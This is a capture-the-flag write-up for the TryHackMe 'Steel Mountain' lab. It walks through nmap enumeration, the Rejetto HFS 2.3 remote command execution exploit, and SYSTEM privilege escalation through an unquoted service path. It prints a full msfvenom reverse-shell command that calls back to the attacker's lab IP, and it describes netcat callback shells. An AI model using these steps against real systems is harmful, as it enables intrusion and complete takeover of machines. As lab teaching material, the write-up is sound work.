Steel Mountain - TryHackMe Room
The link for this lab is located here: https://tryhackme.com/room/steelmountain
In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.
Task 1 - Initial Access
The first step in any room is to perform a scan of the machine to see what ports are open and potentially what services and versions are running. For me, this includes two scans - a simply all ports scan and a more detailed service detection scan on the ports found open. The first scan has a syntax of:
nmap -Pn -p- 10.10.65.225 -oN portscan
Where:
-Pn skips pinging the host
-p- scans all ports
-oN portscan outputs to a file called portscan
This reveals a variety of ports open and services including HTTP, NetBIOS and more. With these ports now found open, we can run a more intensive scan on just these specific ports found to gather more information about them - including possible version numbers and OS detection.
For this second scan, the syntax is the following:
nmap -Pn -T4 -A -p80,135,139,445,3389,5985,8080,47001,47152,47153,47154,47156,47163,47164 10.10.65.225 -oN servicescan
Where:
-Pn skips pinging the host
-T4 speeds up the scan
-A performs service detection, OS detection and runs some scripts
-p[numbers] specifies only the ports found open
-oN servicescan outputs to a file called servicescan
This reveals a ton more information including that Microsoft IIS 8.5 is running on port 80, that the OS is likely running Windows Server 2008 R2 through the NetBIOS information and that an HTTPFileServer 2.3 is running on port 8080.
The next step is to navigate to the website running on port 80.
As we can see this is a very simple website with a logo and an image of a man. If you have watched the show Mr Robot, you will recognize this “employee of the month” as Bill Harper. However, if you don’t know who he is, taking a peek at the source code of the site reveals the full name of the image as “BillHarper.png”
Not much else is on this site. Looking back at the Nmap scan, we saw that there was a HttpFileServer running on port 8080 - this indicates to me that a sort of “hidden” other website running on the server. Navigating to [IP]:8080 reveals the site.
At the bottom of the page, we can actually see a version - HTTPFileServer 2.3. Clicking on the link provided reveals that HTTP File Server is a service to send and receive files.
Since we have a version number, we can try searching for a possible exploit. Googling “rejetto httpfileserver 2.3 exploit” reveals a possible remote command execution vulnerability for this specific version.
To use this exploit, we can first start up the Metasploit console
Once running, we can search for an exploit for “rejetto” using the search functionality. We will see that an exploit module returns for the remote command execution vulnerability we saw before.
Next, we simply use this exploit either using the number on the left of the search results (in this case 0) or by typing the full path to the exploit provided by Metasploit.
Now that we have the right module loaded, we can show the options that we need to set for this exploit to work by typing “options”.
As we can see, there are multiple options that have the Required field set to yes - these MUST be filled out in order to run properly. These options are RHOSTS, RPORT, SRVHOST, SRVPORT, TARGETURI, LHOST, LPORT, and EXITFUNC.
Some of these we can leave on default but some need changed or set. For this exploit, we need to set RHOSTS, RPORT, LHOST and LPORT. The RHOSTS option is the IP of the target machine (10.10.65.225). The RPORT is the port number running the HFS server (in this case 8080). The LHOST is the IP of our local machine’s VPN address received from TryHackMe (10.11.3.112). Finally, the LPORT is the port that will be opened on our local machine to listening for a connection - port 4444 is fine although change it if you want.
Once all these options are set, we can simply run the exploit using the “run” command and hopefully, we should receive a meterpreter shell back.
Once on the system, we can simply cd to the Desktop directory and grab the user.txt flag
Task 2 - Privilege Escalation
To enumerate this machine, we will use a powershell script called PowerUp, that's purpose is to evaluate a Windows machine and determine any abnormalities - PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.
You can download the script here either via your browser or by using the wget command.
Next, you can use the upload command in Meterpreter to upload the script to the target machine.
Once uploaded, we load powershell into the meterpreter session using the “load powershell” command
To access a PowerShell prompt, we simply type “powershell_shell” to drop down to a PS prompt.
Once in the PS shell, we can simply run the PowerUp.ps1 script by typing “. .\PowerUp.ps1”
Once loaded, we can then run “Invoke-AllChecks” to gather information.
This reveals to us a service that has the “CanRestart” option set to True. The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one and restart the service which will run our infected program.
The program also has Unquoted Service Paths. In short, Unquoted Service Path vulnerability arises when path to an executable contains spaces (/Path To/The Executable/File.exe) and isn’t enclosed in quotation marks, so Windows system interprets each argument before the space as the executable (Path.exe, The.exe, File.exe) up until it finds the actual file.
Looking at the path of this executable. We can see there is a space between Program and Files but we probably don’t have write access to the C:\ drive base. Further into the path, we see there is a space between Advanced and SystemCare - this means that Windows will look for a file called Advanced.exe and then SystemCare.exe before dropping into the directory.
Knowing this, we can generate an executable file using msfvenom called “Advanced.exe” that uses a meterpreter payload via the following syntax:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.3.112 LPORT=4456 -f exe > Advanced.exe
Once generated, we can navigate to the C:\Program Files (x86)\IObit directory and upload the Advanced.exe executable - this is the directory where Windows will look for a file named “Advanced.exe” due to unquoted service paths.
Once uploaded, we need a way to catch the reverse shell. Since we are using a meterpreter payload, we need to use the handler in Metasploit. Simply use the “exploit/multi/handler” module and set the options to the EXACT same as you did in the msfvenom command - otherwise it won’t work.
Once set, simply type “run” command and the listener will wait for a connection
Now that everything is in place, we can get back to the meterpreter shell and drop down to a PowerShell prompt once again and simply stop the service that was running via the name specified after we ran the Invoke-AllChecks command (the service name here is AdvancedSystemCareService9). To stop a service using PowerShell, we use the “Stop-Service” command followed by the name
Once stopped, we simply use the “Start-Service” command to start the service back up. During start-up, Windows will look for the Advanced.exe file due to the unquoted path which now exists - our malicious payload. Once ran, we will get an error from PowerShell
However, navigating back to our metasploit handler reveals a second meterpreter session has opened running as NT AUTHORITY/SYSTEM - we have full admin privileges.
For me, this shell was incredibly unstable and would actually die after about a minute or so. If it is stable for you and maintains a meterpreter session, you can simply navigate to the C:\Users\Administrator\Desktop directory and grab the root.txt flag
However, if you are having the same problem I was, there is another method. Instead of using a meterpreter shell, we use an simple shell_reverse_tcp payload using msfvenom instead
Afterwards, the steps are pretty much the same. Once again, we navigate to the IObit directory and upload the Advanced.exe payload we generated
Once we reach the listener stage however, we use netcat instead of the metasploit handler - this is because we don’t need a special listener since we are using a simple shell instead of meterpreter. Simply use netcat to listen on the port you used when generating the reverse shell via msfvenom.
Finally, simply stop the service again using the same commands as before via a PowerShell prompt.
And then start the service once again using the PowerShell syntax
An error will appear once again, but looking back at netcat, we see a reverse shell has appeared. Running the whoami command reveals we are once again running as NT AUTHORITY\SYSTEM - full privileges
Simply navigate to the Administrator desktop to get the root.txt flag again.
Task 3 - Access and Escalation without Metasploit
To access the system without Metasploit we’ll need to do a bit of research on the Rejetto file server exploit in the Exploit-DB. Doing this research, we find the same exploit but this time, we will use the raw Python code and NOT the metasploit module. This code can be found here.
However, before we start, we will need 3 things downloaded. First, the raw python code located here. Secondly, we will need a netcat binary on the target machine. We can download a netcat .exe file from here here. Finally, we need to download the WinPEAS executable for privilege escalation found here.
Once all of them are downloaded, to make it easier, we can create a new directory that contains these three files.
To put it briefly, we’ll run the exploit twice:
Stage 1. The exploit will look for the nc.exe file within the local machine files system and upload it to the target machine.
Stage 2. The exploit will execute the nc.exe on the target server forcing it to connect to our local host.
Now, before running the Python exploit code, we need to modify the local IP and local port number in the source code. The IP will be the TryHackMe VPN IP and the port you can choose any free port you want - I choose 6678.
Once edited, we first host the netcat executable via a Python3 web server on port 80
Once hosting, we need to start a netcat listener on the same port we used in the Python source code - for me that is port 6678.
Once everything is ready, we simply run the exploit twice - specifying the target IP address and port running the HFS file server (port 8080) - you may notice my IP is different from the start - this is because I restarted the machine due to an error but it should be the same for you as before.
Once execute, we can see that nc.exe was downloaded from our python web server
Navigating to the netcat listener, we see we receive a shell back on the target system
Now that we are on the system, we need to escalate our privileges. To do this, I first navigate to Bill’s desktop because we have the privileges to write there. Once there, we can use PowerShell to download the winpeas.exe file from our still hosted Python3 web server to the target machine.
Once downloaded, simply run it using “.\winPEAS.exe” command and wait for it to run fully. Once ran, it will identify the same AdvancedSystemCareServce9 service running with the unquoted service path and also tells us that bill has write permissions.
Once identified, we can once again use msfvenom to generate a reverse shell using the unquoted service path to create an Advanced.exe file that will get executed.
To upload the Advanced.exe file, we can put the .exe into the same directory as the Python web server and use PowerShell once again to download it to the target.
Before copying the Advanced.exe file on Bill’s desktop to the right folder, we need to stop the service using it. To stop the service, use the “sc stop AdvancedSystemCareService9” command. Once stopped, use the “copy” command to copy it to the IObit directory
Finally, we once again start a netcat listener using the same port specified in msfvenom.
Lastly, we simply use the “sc start AdvancedSystemCareService9” command to restart the service and execute our malicious Advanced.exe file
It will produce an error. However, navigating back to the netcast listener, we get a shell back running as SYSTEM user - full privileges.
And, for the final time, we can navigate to the admin’s desktop and get the root.txt flag.
I hope this room has been incredibly informative for you as it was for me. I included the failed attempt at using a meterpreter shell as a lesson that things will not always work out and you will have to think on your feet to try another method. I hope you enjoyed this write-up and good luck on your journey to becoming a master.